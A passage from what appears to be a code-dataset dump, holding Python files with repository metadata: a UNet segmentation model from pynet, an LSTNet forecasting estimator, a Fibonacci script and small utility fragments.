            # timestamp written by RecordLayer(append_time=True).
            data = data[data.index(',')+1:]
        return data
    def initialize(self):
        self.file = open(self.filename, 'rb')
    def get_input(self):
        line = self.file.readline()
        if len(line) == 0:
            # Empty read means end of file: stop the layer.
            self.stop()
            return None
        time.sleep(self.interval)
        return self.decode(line)
class AudioWriter(TransformMixin, ThreadLayer):
    """Layer that writes incoming audio sample buffers to a WAV file."""
    def __init__(self, port_in, filename=None, sample_rate=44100, *args, **kwargs):
        super().__init__(port_in, *args, **kwargs)
        if filename is None:
            filename = RecordLayer.make_new_filename('recording')
        self.filename = filename
        self.sample_rate = sample_rate
    def transform(self, data):
        # Lazy import keeps scipy optional for users who never write audio.
        import scipy.io.wavfile
        # Each call rewrites the target file with the latest buffer.
        scipy.io.wavfile.write(self.filename, self.sample_rate, data)
    @staticmethod
    def make_new_filename():
        # NOTE(review): unused duplicate of RecordLayer.make_new_filename
        # (and yields a '.txt' suffix for a WAV writer) -- consider removing.
        timestamp = datetime.now().strftime("%y_%m_%d_%H_%M_%S")
        return "recording_%s.txt" % timestamp
| 2,606 | 370 | 176 |
a7030cae2429a487b2f2fa49806ec37f38fc6875 | 107 | py | Python | tests/test_get_data/__init__.py | jm-rivera/pydeflate | 3e95950124de4bdcfb7fdcefdc91cbe1b2c32935 | [
"MIT"
] | null | null | null | tests/test_get_data/__init__.py | jm-rivera/pydeflate | 3e95950124de4bdcfb7fdcefdc91cbe1b2c32935 | [
"MIT"
] | null | null | null | tests/test_get_data/__init__.py | jm-rivera/pydeflate | 3e95950124de4bdcfb7fdcefdc91cbe1b2c32935 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 20 12:17:30 2021
@author: jorge
"""
| 13.375 | 35 | 0.598131 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 20 12:17:30 2021
@author: jorge
"""
| 0 | 0 | 0 |
07f74a95da853c13aa66d869a6ab1ec3af5c3c47 | 14,957 | py | Python | pynet/models/unet.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/models/unet.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | pynet/models/unet.py | Duplums/pynet | 5f91dc2e80c2eb4e44d57403dd65aa80e8a5875b | [
"CECILL-B"
] | null | null | null | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2019
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
The U-Net is a convolutional encoder-decoder neural network.
"""
# Imports
import ast
import collections
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as func
from pynet.utils import tensor2im
class UNet(nn.Module):
    """ UNet.
    The U-Net is a convolutional encoder-decoder neural network.
    Contextual spatial information (from the decoding,
    expansive pathway) about an input tensor is merged with
    information representing the localization of details
    (from the encoding, compressive pathway).
    Modifications to the original paper:
    - padding is used in 3x3x3 convolutions to prevent loss
    of border pixels
    - merging outputs does not require cropping due to (1)
    - residual connections can be used by specifying
    UNet(merge_mode='add')
    - if non-parametric upsampling is used in the decoder
    pathway (specified by upmode='upsample'), then an
    additional 1x1x1 3d convolution occurs after upsampling
    to reduce channel dimensionality by a factor of 2.
    This channel halving happens with the convolution in
    the transpose convolution (specified by upmode='transpose')
    """
    def __init__(self, num_classes, in_channels=1, depth=5,
                 start_filts=16, up_mode="transpose", down_mode="maxpool",
                 merge_mode="concat", batchnorm=False, dim="3d",
                 skip_connections=False, mode="seg", input_size=None,
                 nb_regressors=None, freeze_encoder=False):
        """ Init class.
        Parameters
        ----------
        num_classes: int
            the number of features in the output segmentation map.
        in_channels: int, default 1
            number of channels in the input tensor.
        depth: int, default 5
            number of layers in the U-Net.
        start_filts: int, default 16
            number of convolutional filters for the first conv.
        up_mode: string, default 'transpose'
            type of upconvolution. Choices: 'transpose' for transpose
            convolution, 'upsample' for nearest neighbour upsampling
        down_mode: string, default 'maxpool'
            Choices: 'maxpool' for maxpool, 'conv' for convolutions with stride=2
        merge_mode: str, default 'concat', can be 'add' or None
            the skip connections merging strategy.
        skip_connections: bool, whether we add skip connections between conv layers or not
        batchnorm: bool, default False
            normalize the inputs of the activation function.
        mode: 'str', default 'seg'
            Whether the network is turned in 'segmentation' mode ("seg") or 'classification' mode ("classif") or both
            ("seg_classif"). Only the encoder can be also used in mode ("encoder")
            The input_size is required for classification
        input_size: tuple (optional) it is required for classification only. It should be a tuple (C, H, W, D) (for 3d)
            or (C, H, W) (for 2d)
        dim: str, default '3d'
            '3d' or '2d' input data.

        Raises
        ------
        ValueError
            if dim, mode, up_mode, merge_mode or down_mode is invalid, or
            if up_mode='upsample' is combined with merge_mode='add'.
        """
        # Inheritance
        super(UNet, self).__init__()
        # Check inputs
        if dim in ("2d", "3d"):
            self.dim = dim
        else:
            # Fixed error message: it previously repeated the merge_mode text.
            raise ValueError(
                "'{}' is not a valid dimension. Only '3d' and '2d' are "
                "allowed.".format(dim))
        if mode in ("seg", "classif", "seg_classif", "encoder", "simCLR"):
            self.mode = mode
        else:
            # Fixed error message: now lists every accepted mode.
            raise ValueError(
                "'{}' is not a valid mode. Choose among 'seg', 'classif', "
                "'seg_classif', 'encoder' or 'simCLR'.".format(mode))
        if up_mode in ("transpose", "upsample"):
            self.up_mode = up_mode
        else:
            raise ValueError(
                "'{}' is not a valid mode for upsampling. Only 'transpose' "
                "and 'upsample' are allowed.".format(up_mode))
        if merge_mode in ("concat", "add", None):
            self.merge_mode = merge_mode
        else:
            # Bug fix: the message previously formatted up_mode instead of
            # the offending merge_mode value.
            raise ValueError(
                "'{}' is not a valid mode for merging up and down paths. Only "
                "'concat' and 'add' are allowed.".format(merge_mode))
        if down_mode in ("maxpool", "conv"):
            self.down_mode = down_mode
        else:
            raise ValueError(
                "'{}' is not a valid mode for down sampling. Only 'maxpool' "
                "and 'conv' are allowed".format(down_mode)
            )
        if self.up_mode == "upsample" and self.merge_mode == "add":
            raise ValueError(
                "up_mode 'upsample' is incompatible with merge_mode 'add' at "
                "the moment because it doesn't make sense to use nearest "
                "neighbour to reduce depth channels (by half).")
        # Declare class parameters
        self.num_classes = num_classes
        self.in_channels = in_channels
        self.start_filts = start_filts
        self.input_size = input_size
        self.nb_regressors = nb_regressors
        self.depth = depth
        self.down = []
        self.up = [] # Useful in seg mode
        self.classifier = None # Useful in classif mode
        self.freeze_encoder = freeze_encoder
        self.name = "UNet_D%i_%s" % (self.depth, self.mode)
        # Create the encoder pathway: channel width doubles at every level,
        # spatial downsampling starts from the second level.
        for cnt in range(depth):
            in_channels = self.in_channels if cnt == 0 else out_channels
            out_channels = self.start_filts * (2**cnt)
            down_sampling = cnt > 0
            self.down.append(
                Down(in_channels, out_channels, self.dim, down_mode=self.down_mode,
                     pooling=down_sampling, batchnorm=batchnorm,
                     skip_connections=skip_connections))
        # Freeze all the layers if necessary
        if self.freeze_encoder:
            for down_m in self.down:
                for param in down_m.parameters():
                    param.requires_grad = False
        if self.mode == "seg" or self.mode == "seg_classif":
            # Create the decoder pathway
            # - careful! decoding only requires depth-1 blocks
            for cnt in range(depth - 1):
                in_channels = out_channels
                out_channels = in_channels // 2
                self.up.append(
                    Up(in_channels, out_channels, up_mode=up_mode, dim=self.dim,
                       merge_mode=merge_mode, batchnorm=batchnorm,
                       skip_connections=skip_connections))
        if self.mode == "classif" or self.mode == "seg_classif":
            # Classification head consumes the deepest encoder feature map.
            self.classifier = Classifier(self.nb_regressors, features=self.start_filts * 2**(self.depth-1))
        elif self.mode == 'simCLR':
            # Projection head for contrastive (SimCLR-style) pre-training.
            self.hidden_representation = nn.Linear(self.start_filts * (2**(self.depth-1)), 512)
            self.head_projection = nn.Linear(512, 128)
        # Add the list of modules to current module
        self.down = nn.ModuleList(self.down)
        self.up = nn.ModuleList(self.up)
        # Get output segmentation
        if self.mode == "seg" or self.mode == "seg_classif":
            self.conv_final = Conv1x1x1(out_channels, self.num_classes, self.dim)
        # Kernel initializer
        # Weight initialization
        self.weight_initializer()
class Down(nn.Module):
"""
A helper Module that performs 2 convolutions and 1 MaxPool.
A ReLU activation and optionally a BatchNorm follows each convolution.
"""
class Up(nn.Module):
"""
A helper Module that performs 2 convolutions and 1 UpConvolution.
A ReLU activation and optionally a BatchNorm follows each convolution.
"""
| 40.424324 | 119 | 0.588487 | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2019
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
The U-Net is a convolutional encoder-decoder neural network.
"""
# Imports
import ast
import collections
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as func
from pynet.utils import tensor2im
class UNet(nn.Module):
""" UNet.
The U-Net is a convolutional encoder-decoder neural network.
Contextual spatial information (from the decoding,
expansive pathway) about an input tensor is merged with
information representing the localization of details
(from the encoding, compressive pathway).
Modifications to the original paper:
- padding is used in 3x3x3 convolutions to prevent loss
of border pixels
- merging outputs does not require cropping due to (1)
- residual connections can be used by specifying
UNet(merge_mode='add')
- if non-parametric upsampling is used in the decoder
pathway (specified by upmode='upsample'), then an
additional 1x1x1 3d convolution occurs after upsampling
to reduce channel dimensionality by a factor of 2.
This channel halving happens with the convolution in
the tranpose convolution (specified by upmode='transpose')
"""
def __init__(self, num_classes, in_channels=1, depth=5,
start_filts=16, up_mode="transpose", down_mode="maxpool",
merge_mode="concat", batchnorm=False, dim="3d",
skip_connections=False, mode="seg", input_size=None,
nb_regressors=None, freeze_encoder=False):
""" Init class.
Parameters
----------
num_classes: int
the number of features in the output segmentation map.
in_channels: int, default 1
number of channels in the input tensor.
depth: int, default 5
number of layers in the U-Net.
start_filts: int, default 16
number of convolutional filters for the first conv.
up_mode: string, default 'transpose'
type of upconvolution. Choices: 'transpose' for transpose
convolution, 'upsample' for nearest neighbour upsampling
down_mode: string, default 'maxpool'
Choices: 'maxpool' for maxpool, 'conv' for convolutions with stride=2
merge_mode: str, default 'concat', can be 'add' or None
the skip connections merging strategy.
skip_connections: bool, whether we add skip connections between conv layers or not
batchnorm: bool, default False
normalize the inputs of the activation function.
mode: 'str', default 'seg'
Whether the network is turned in 'segmentation' mode ("seg") or 'classification' mode ("classif") or both
("seg_classif"). Only the encoder can be also used in mode ("encoder")
The input_size is required for classification
input_size: tuple (optional) it is required for classification only. It should be a tuple (C, H, W, D) (for 3d)
or (C, H, W) (for 2d)
dim: str, default '3d'
'3d' or '2d' input data.
"""
# Inheritance
super(UNet, self).__init__()
# Check inputs
if dim in ("2d", "3d"):
self.dim = dim
else:
raise ValueError(
"'{}' is not a valid mode for merging up and down paths. Only "
"'3d' and '2d' are allowed.".format(dim))
if mode in ("seg", "classif", "seg_classif", "encoder", "simCLR"):
self.mode = mode
else:
raise ValueError("'{}' is not a valid mode. Should be in 'seg' "
"or 'classif' mode.".format(mode))
if up_mode in ("transpose", "upsample"):
self.up_mode = up_mode
else:
raise ValueError(
"'{}' is not a valid mode for upsampling. Only 'transpose' "
"and 'upsample' are allowed.".format(up_mode))
if merge_mode in ("concat", "add", None):
self.merge_mode = merge_mode
else:
raise ValueError(
"'{}' is not a valid mode for merging up and down paths. Only "
"'concat' and 'add' are allowed.".format(up_mode))
if down_mode in ("maxpool", "conv"):
self.down_mode = down_mode
else:
raise ValueError(
"'{}' is not a valid mode for down sampling. Only 'maxpool' "
"and 'conv' are allowed".format(down_mode)
)
if self.up_mode == "upsample" and self.merge_mode == "add":
raise ValueError(
"up_mode 'upsample' is incompatible with merge_mode 'add' at "
"the moment because it doesn't make sense to use nearest "
"neighbour to reduce depth channels (by half).")
# Declare class parameters
self.num_classes = num_classes
self.in_channels = in_channels
self.start_filts = start_filts
self.input_size = input_size
self.nb_regressors = nb_regressors
self.depth = depth
self.down = []
self.up = [] # Useful in seg mode
self.classifier = None # Useful in classif mode
self.freeze_encoder = freeze_encoder
self.name = "UNet_D%i_%s" % (self.depth, self.mode)
# Create the encoder pathway
for cnt in range(depth):
in_channels = self.in_channels if cnt == 0 else out_channels
out_channels = self.start_filts * (2**cnt)
down_sampling = False if cnt == 0 else True
self.down.append(
Down(in_channels, out_channels, self.dim, down_mode=self.down_mode,
pooling=down_sampling, batchnorm=batchnorm,
skip_connections=skip_connections))
# Freeze all the layers if necessary
if self.freeze_encoder:
for down_m in self.down:
for param in down_m.parameters():
param.requires_grad = False
if self.mode == "seg" or self.mode == "seg_classif":
# Create the decoder pathway
# - careful! decoding only requires depth-1 blocks
for cnt in range(depth - 1):
in_channels = out_channels
out_channels = in_channels // 2
self.up.append(
Up(in_channels, out_channels, up_mode=up_mode, dim=self.dim,
merge_mode=merge_mode, batchnorm=batchnorm,
skip_connections=skip_connections))
if self.mode == "classif" or self.mode == "seg_classif":
self.classifier = Classifier(self.nb_regressors, features=self.start_filts * 2**(self.depth-1))
elif self.mode == 'simCLR':
self.hidden_representation = nn.Linear(self.start_filts * (2**(self.depth-1)), 512)
self.head_projection = nn.Linear(512, 128)
# Add the list of modules to current module
self.down = nn.ModuleList(self.down)
self.up = nn.ModuleList(self.up)
# Get ouptut segmentation
if self.mode == "seg" or self.mode == "seg_classif":
self.conv_final = Conv1x1x1(out_channels, self.num_classes, self.dim)
# Kernel initializer
# Weight initialization
self.weight_initializer()
def weight_initializer(self):
for module in self.modules():
if isinstance(module, nn.ConvTranspose3d) or isinstance(module, nn.Conv3d):
nn.init.xavier_normal_(module.weight)
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.BatchNorm2d):
nn.init.constant_(module.weight, 1)
nn.init.constant_(module.bias, 0)
elif isinstance(module, nn.Linear):
nn.init.normal_(module.weight, 0, 0.01)
nn.init.constant_(module.bias, 0)
def forward(self, x):
encoder_outs = []
for module in self.down:
x = module(x)
encoder_outs.append(x)
x_enc = x
if self.mode == "encoder":
# Avg over each output feature map, output size should be == nb_filters
return nn.functional.adaptive_avg_pool3d(x_enc, 1)
elif self.mode == 'simCLR':
x_enc = nn.functional.relu(x_enc)
x_enc = nn.functional.adaptive_avg_pool3d(x_enc, 1)
x_enc = torch.flatten(x_enc, 1)
x_enc = self.hidden_representation(x_enc)
x_enc = nn.functional.relu(x_enc)
x_enc = self.head_projection(x_enc)
return x_enc
if self.mode == "seg" or self.mode == "seg_classif":
encoder_outs = encoder_outs[:-1][::-1]
for cnt, module in enumerate(self.up):
x_up = encoder_outs[cnt]
x = module(x, x_up)
# No softmax is used. This means you need to use
# nn.CrossEntropyLoss in your training script,
# as this module includes a softmax already.
x_seg = self.conv_final(x)
if self.mode == "classif" or self.mode == "seg_classif":
# No softmax used
x_classif = self.classifier(x_enc)
if self.mode == "seg":
return x_seg
if self.mode == "classif":
return x_classif
return [x_seg, x_classif]
class Classifier(nn.Module):
    """Regression/classification head for the UNet encoder output.

    Global-average-pools the (N, C, D, H, W) feature map down to one value
    per channel, then applies two LeakyReLU-activated linear layers mapping
    ``features -> 1024 -> nb_regressors``.
    """
    def __init__(self, nb_regressors, features):
        super(Classifier, self).__init__()
        self.num_classes = nb_regressors
        self.features = features
        # Attribute names are kept unchanged: they define state_dict keys.
        self.fc1 = nn.Linear(self.features, 1024, bias=True)
        self.fc2 = nn.Linear(1024, self.num_classes, bias=True)
        self.relu = nn.LeakyReLU(inplace=True)
        self.avgpool = nn.AdaptiveAvgPool3d(1)
    def forward(self, x):
        pooled = torch.flatten(self.avgpool(x), 1)
        hidden = self.relu(self.fc1(pooled))
        scores = self.relu(self.fc2(hidden))
        # squeeze(1) collapses the output dim when nb_regressors == 1,
        # yielding a flat (N,) tensor instead of (N, 1).
        return scores.squeeze(1)
class DoubleConv(nn.Module):
    """Two successive convolutions, each followed by optional batch
    normalization and an in-place ReLU.

    Parameters
    ----------
    in_channels: int
        channels of the input tensor.
    out_channels: int
        channels produced by both convolutions.
    dim: str
        '2d' or '3d'; selects nn.Conv2d/nn.Conv3d and matching BatchNorm.
    kernel_size, stride, padding, bias:
        forwarded unchanged to both convolution layers.
    batchnorm: bool, default True
        insert a BatchNorm layer after each convolution.
    """
    def __init__(self, in_channels, out_channels, dim, kernel_size=3, stride=1,
                 padding=1, bias=True, batchnorm=True):
        super(DoubleConv, self).__init__()
        self.batchnorm = batchnorm
        # Resolve the layer classes by name (e.g. nn.Conv3d) with getattr
        # instead of eval(): same behavior, no dynamic code execution.
        conv_cls = getattr(nn, "Conv{0}".format(dim))
        self.conv1 = conv_cls(in_channels, out_channels, kernel_size,
                              stride=stride, padding=padding, bias=bias)
        self.conv2 = conv_cls(out_channels, out_channels, kernel_size,
                              stride=stride, padding=padding, bias=bias)
        self.relu = nn.ReLU(inplace=True)
        if batchnorm:
            norm_cls = getattr(nn, "BatchNorm{0}".format(dim))
            self.norm1 = norm_cls(out_channels)
            self.norm2 = norm_cls(out_channels)
    def forward(self, x):
        # conv -> [norm] -> relu, applied twice.
        x = self.conv1(x)
        if self.batchnorm:
            x = self.norm1(x)
        x = self.relu(x)
        x = self.conv2(x)
        if self.batchnorm:
            x = self.norm2(x)
        x = self.relu(x)
        return x
def UpConv(in_channels, out_channels, dim, mode="transpose"):
    """Build an upsampling module that doubles the spatial resolution.

    mode='transpose' -> learned nn.ConvTranspose2d/3d (kernel 2, stride 2).
    mode='upsample'  -> nearest-neighbour upsampling followed by a 1x1(x1)
                        convolution mapping in_channels to out_channels.
    Any other mode falls through and returns None.
    """
    if mode == "transpose":
        # Resolve the class by name with getattr instead of eval():
        # same behavior, no dynamic code execution.
        upconv_cls = getattr(nn, "ConvTranspose{0}".format(dim))
        return upconv_cls(in_channels, out_channels, kernel_size=2, stride=2)
    elif mode == "upsample":
        # out_channels is always going to be the same as in_channels
        return nn.Sequential(collections.OrderedDict([
            ("up", nn.Upsample(mode="nearest", scale_factor=2)),
            ("conv1x", Conv1x1x1(in_channels, out_channels, dim))]))
    # else:
    #     return eval(
    #         "nn.MaxUnpool{0}(2)".format(dim)
    #     )
def Conv1x1x1(in_channels, out_channels, dim, groups=1):
    """Return a 1x1 (2d) or 1x1x1 (3d) convolution with stride 1.

    Used to change the channel count without touching spatial resolution.
    """
    # Resolve nn.Conv2d / nn.Conv3d by name with getattr instead of eval().
    conv_cls = getattr(nn, "Conv{0}".format(dim))
    return conv_cls(in_channels, out_channels, kernel_size=1, groups=groups,
                    stride=1)
class Down(nn.Module):
    """
    A helper Module that performs 2 convolutions and 1 MaxPool.
    A ReLU activation and optionally a BatchNorm follows each convolution.
    """
    def __init__(self, in_channels, out_channels, dim, pooling=True,
                 down_mode='maxpool', batchnorm=True, skip_connections=False):
        super(Down, self).__init__()
        self.pooling = pooling
        self.down_mode = down_mode
        self.skip_connections = skip_connections
        if self.down_mode == "maxpool":
            # Downsample with 2x2(x2) max pooling, then a double conv that
            # maps in_channels -> out_channels.
            self.maxpool = eval("nn.MaxPool{0}(2)".format(dim))
            self.doubleconv = DoubleConv(in_channels, out_channels, dim, batchnorm=batchnorm)
        else:
            # Downsample with a strided convolution that already maps to
            # out_channels, so the following double conv keeps the width.
            self.downconv = eval("nn.Conv{0}(in_channels, out_channels, kernel_size=2, stride=2)".format(dim))
            if self.pooling:
                self.doubleconv = DoubleConv(out_channels, out_channels, dim, batchnorm=batchnorm)
            else:
                self.doubleconv = DoubleConv(in_channels, out_channels, dim, batchnorm=batchnorm)
    def forward(self, x):
        if self.down_mode == "maxpool":
            # pooling=False on the first encoder level keeps full resolution.
            if self.pooling:
                x = self.maxpool(x)
            x = self.doubleconv(x)
        else:
            if self.pooling:
                x_down = self.downconv(x)
                x = self.doubleconv(x_down)
                if self.skip_connections:
                    # Residual connection around the double conv (valid here
                    # because x and x_down share the same channel count).
                    x = x + x_down
            else:
                x = self.doubleconv(x)
        return x
class Up(nn.Module):
    """
    A helper Module that performs 2 convolutions and 1 UpConvolution.
    A ReLU activation and optionally a BatchNorm follows each convolution.
    """
    def __init__(self, in_channels, out_channels, dim, merge_mode="concat",
                 up_mode="transpose", batchnorm=True, skip_connections=False):
        super(Up, self).__init__()
        self.merge_mode = merge_mode
        self.skip_connections = skip_connections
        self.up_mode = up_mode
        # Upsampling halves the channel count: in_channels -> out_channels.
        self.upconv = UpConv(in_channels, out_channels, dim, mode=up_mode)
        if self.merge_mode == "concat":
            # Concatenating the encoder features doubles the channels back
            # to in_channels before the double conv.
            self.doubleconv = DoubleConv(in_channels, out_channels, dim, batchnorm=batchnorm)
        else:
            self.doubleconv = DoubleConv(out_channels, out_channels, dim, batchnorm=batchnorm)
    def forward(self, x_down, x_up):
        """Upsample x_down, merge with the encoder feature x_up, convolve."""
        x_down = self.upconv(x_down)
        if self.merge_mode == "concat":
            x = torch.cat((x_up, x_down), dim=1)
        elif self.merge_mode == "add":
            x = x_up + x_down
        else:
            # merge_mode is None: encoder features are ignored entirely.
            x = x_down
        x = self.doubleconv(x)
        if self.skip_connections:
            # Residual connection around the double conv.
            x = x + x_down
        return x
| 6,489 | 14 | 358 |
d7b9d85d7abdc6211c2282d0512cf4ac7d2aadf3 | 113 | py | Python | AlgoMethod/dp/simple_dp/03.py | Nishi05/Competitive-programming | e59a6755b706d9d5c1f359f4511d92c114e6a94e | [
"MIT"
] | null | null | null | AlgoMethod/dp/simple_dp/03.py | Nishi05/Competitive-programming | e59a6755b706d9d5c1f359f4511d92c114e6a94e | [
"MIT"
] | null | null | null | AlgoMethod/dp/simple_dp/03.py | Nishi05/Competitive-programming | e59a6755b706d9d5c1f359f4511d92c114e6a94e | [
"MIT"
] | null | null | null | n = int(input())
F = [0]*(n+1)
F[0], F[1] = 0, 1
for i in range(2, n+1):
F[i] = F[i-1] + F[i-2]
print(F[n])
| 14.125 | 26 | 0.424779 | n = int(input())
F = [0]*(n+1)
F[0], F[1] = 0, 1
for i in range(2, n+1):
F[i] = F[i-1] + F[i-2]
print(F[n])
| 0 | 0 | 0 |
e6d489f5056d991fbe7591b3c1f265cf7f919903 | 5,917 | py | Python | pts/model/lstnet/lstnet_estimator.py | nitinthedreamer/pytorch-ts | 7f81b2fbab2e8913792d841b0d66deb489ee6185 | [
"Apache-2.0",
"MIT"
] | 647 | 2020-03-16T16:47:50.000Z | 2022-03-31T23:29:40.000Z | pts/model/lstnet/lstnet_estimator.py | nitinthedreamer/pytorch-ts | 7f81b2fbab2e8913792d841b0d66deb489ee6185 | [
"Apache-2.0",
"MIT"
] | 71 | 2020-03-17T10:58:14.000Z | 2022-03-23T08:53:12.000Z | pts/model/lstnet/lstnet_estimator.py | nitinthedreamer/pytorch-ts | 7f81b2fbab2e8913792d841b0d66deb489ee6185 | [
"Apache-2.0",
"MIT"
] | 110 | 2020-03-16T17:39:45.000Z | 2022-03-25T22:26:39.000Z | from typing import List, Optional
import numpy as np
import torch
import torch.nn as nn
from gluonts.core.component import validated
from gluonts.dataset.field_names import FieldName
from gluonts.torch.util import copy_parameters
from gluonts.torch.model.predictor import PyTorchPredictor
from gluonts.model.predictor import Predictor
from gluonts.transform import (
InstanceSplitter,
ValidationSplitSampler,
TestSplitSampler,
Transformation,
Chain,
ExpectedNumInstanceSampler,
AddObservedValuesIndicator,
AsNumpyArray,
)
from pts.model import PyTorchEstimator
from pts import Trainer
from pts.model.utils import get_module_forward_input_names
from .lstnet_network import LSTNetTrain, LSTNetPredict
| 34.805882 | 88 | 0.653034 | from typing import List, Optional
import numpy as np
import torch
import torch.nn as nn
from gluonts.core.component import validated
from gluonts.dataset.field_names import FieldName
from gluonts.torch.util import copy_parameters
from gluonts.torch.model.predictor import PyTorchPredictor
from gluonts.model.predictor import Predictor
from gluonts.transform import (
InstanceSplitter,
ValidationSplitSampler,
TestSplitSampler,
Transformation,
Chain,
ExpectedNumInstanceSampler,
AddObservedValuesIndicator,
AsNumpyArray,
)
from pts.model import PyTorchEstimator
from pts import Trainer
from pts.model.utils import get_module_forward_input_names
from .lstnet_network import LSTNetTrain, LSTNetPredict
class LSTNetEstimator(PyTorchEstimator):
    """GluonTS-style estimator for the LSTNet multivariate forecasting model.

    Wires together the data transformation pipeline, the LSTNet training
    network, and the prediction network/predictor. Either ``horizon``
    (direct single-horizon output) or ``prediction_length`` (multi-step
    output) determines how far into the future each training instance
    extends.
    """
    @validated()
    def __init__(
        self,
        freq: str,
        prediction_length: Optional[int],
        context_length: int,
        num_series: int,
        ar_window: int = 24,
        skip_size: int = 24,
        channels: int = 100,
        kernel_size: int = 6,
        horizon: Optional[int] = None,
        trainer: Trainer = Trainer(),
        dropout_rate: Optional[float] = 0.2,
        output_activation: Optional[str] = None,
        rnn_cell_type: str = "GRU",
        rnn_num_cells: int = 100,
        skip_rnn_cell_type: str = "GRU",
        skip_rnn_num_cells: int = 5,
        scaling: bool = True,
        dtype: np.dtype = np.float32,
    ):
        """Store hyper-parameters and build the train/validation samplers.

        ``future_length`` is ``horizon`` when given, otherwise
        ``prediction_length``; both samplers require at least that much
        future data when cutting training/validation instances.
        """
        super().__init__(trainer, dtype=dtype)
        self.freq = freq
        self.num_series = num_series
        self.skip_size = skip_size
        self.ar_window = ar_window
        self.horizon = horizon
        self.prediction_length = prediction_length
        self.future_length = horizon if horizon is not None else prediction_length
        self.context_length = context_length
        self.channels = channels
        self.kernel_size = kernel_size
        self.dropout_rate = dropout_rate
        self.output_activation = output_activation
        self.rnn_cell_type = rnn_cell_type
        self.rnn_num_cells = rnn_num_cells
        self.skip_rnn_cell_type = skip_rnn_cell_type
        self.skip_rnn_num_cells = skip_rnn_num_cells
        self.scaling = scaling
        self.train_sampler = ExpectedNumInstanceSampler(
            num_instances=1.0, min_future=self.future_length
        )
        self.validation_sampler = ValidationSplitSampler(min_future=self.future_length)
        self.dtype = dtype
    def create_transformation(self) -> Transformation:
        """Coerce the 2-D target to an ndarray and add the observed-values mask."""
        return Chain(
            trans=[
                AsNumpyArray(field=FieldName.TARGET, expected_ndim=2, dtype=self.dtype),
                AddObservedValuesIndicator(
                    target_field=FieldName.TARGET,
                    output_field=FieldName.OBSERVED_VALUES,
                    dtype=self.dtype,
                ),
            ]
        )
    def create_instance_splitter(self, mode: str):
        """Build the (past, future) instance splitter for the given mode.

        ``mode`` selects the sampler: random instances for "training", the
        validation split sampler for "validation", and the end-of-series
        sampler for "test"/prediction.
        """
        assert mode in ["training", "validation", "test"]
        instance_sampler = {
            "training": self.train_sampler,
            "validation": self.validation_sampler,
            "test": TestSplitSampler(),
        }[mode]
        return InstanceSplitter(
            target_field=FieldName.TARGET,
            is_pad_field=FieldName.IS_PAD,
            start_field=FieldName.START,
            forecast_start_field=FieldName.FORECAST_START,
            instance_sampler=instance_sampler,
            time_series_fields=[FieldName.OBSERVED_VALUES],
            past_length=self.context_length,
            future_length=self.future_length,
            output_NTC=False,
        )
    def create_training_network(self, device: torch.device) -> LSTNetTrain:
        """Instantiate the LSTNet training network on the given device."""
        return LSTNetTrain(
            num_series=self.num_series,
            channels=self.channels,
            kernel_size=self.kernel_size,
            rnn_cell_type=self.rnn_cell_type,
            rnn_num_cells=self.rnn_num_cells,
            skip_rnn_cell_type=self.skip_rnn_cell_type,
            skip_rnn_num_cells=self.skip_rnn_num_cells,
            skip_size=self.skip_size,
            ar_window=self.ar_window,
            context_length=self.context_length,
            horizon=self.horizon,
            prediction_length=self.prediction_length,
            dropout_rate=self.dropout_rate,
            output_activation=self.output_activation,
            scaling=self.scaling,
        ).to(device)
    def create_predictor(
        self,
        transformation: Transformation,
        trained_network: LSTNetTrain,
        device: torch.device,
    ) -> PyTorchPredictor:
        """Copy trained weights into a prediction network and wrap it in a
        predictor together with the test-time transformation pipeline."""
        prediction_network = LSTNetPredict(
            num_series=self.num_series,
            channels=self.channels,
            kernel_size=self.kernel_size,
            rnn_cell_type=self.rnn_cell_type,
            rnn_num_cells=self.rnn_num_cells,
            skip_rnn_cell_type=self.skip_rnn_cell_type,
            skip_rnn_num_cells=self.skip_rnn_num_cells,
            skip_size=self.skip_size,
            ar_window=self.ar_window,
            context_length=self.context_length,
            horizon=self.horizon,
            prediction_length=self.prediction_length,
            dropout_rate=self.dropout_rate,
            output_activation=self.output_activation,
            scaling=self.scaling,
        ).to(device)
        copy_parameters(trained_network, prediction_network)
        input_names = get_module_forward_input_names(prediction_network)
        prediction_splitter = self.create_instance_splitter("test")
        return PyTorchPredictor(
            input_transform=transformation + prediction_splitter,
            input_names=input_names,
            prediction_net=prediction_network,
            batch_size=self.trainer.batch_size,
            freq=self.freq,
            prediction_length=self.horizon or self.prediction_length,
            device=device,
        )
| 4,988 | 170 | 23 |
7a66572067f8305e5b63b5c06553c18be4e3c50c | 829 | py | Python | python/utils.py | oliche/NeuropixelsRegistration | 6dc97ea46f531f2adaf2cf2cf5277d6aaf499e88 | [
"MIT"
] | 7 | 2021-01-25T17:29:53.000Z | 2022-02-20T23:13:15.000Z | python/utils.py | oliche/NeuropixelsRegistration | 6dc97ea46f531f2adaf2cf2cf5277d6aaf499e88 | [
"MIT"
] | 1 | 2021-04-08T04:10:54.000Z | 2022-01-28T09:35:38.000Z | python/utils.py | oliche/NeuropixelsRegistration | 6dc97ea46f531f2adaf2cf2cf5277d6aaf499e88 | [
"MIT"
] | 2 | 2021-01-25T17:29:56.000Z | 2022-02-04T14:09:14.000Z | import numpy as np
from scipy.io import loadmat
import os | 31.884615 | 79 | 0.677925 | import numpy as np
from scipy.io import loadmat
import os
def mat2npy(mat_chanmap_dir, out_path='chanmap.npy'):
    """Convert a MATLAB channel map to a ``(n_channels, 2)`` ``.npy`` array.

    Parameters
